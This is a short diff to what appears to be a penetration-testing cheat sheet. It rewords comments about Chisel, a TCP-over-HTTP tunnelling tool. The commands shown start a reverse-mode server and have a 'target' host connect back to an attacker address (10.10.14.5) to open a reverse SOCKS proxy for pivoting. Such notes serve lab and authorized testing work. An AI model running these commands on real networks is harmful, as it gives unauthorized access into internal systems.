 Chisel

-# Fast TCP tunnel over HTTP — great for restricted environments
+# Fast TCP tunnel over HTTP — useful when SSH isn't available

 ./chisel server -p 8080 --reverse

-# Target (client mode) — reverse SOCKS proxy
+# Target — connect back and create a reverse SOCKS proxy

 ./chisel client 10.10.14.5:8080 R:socks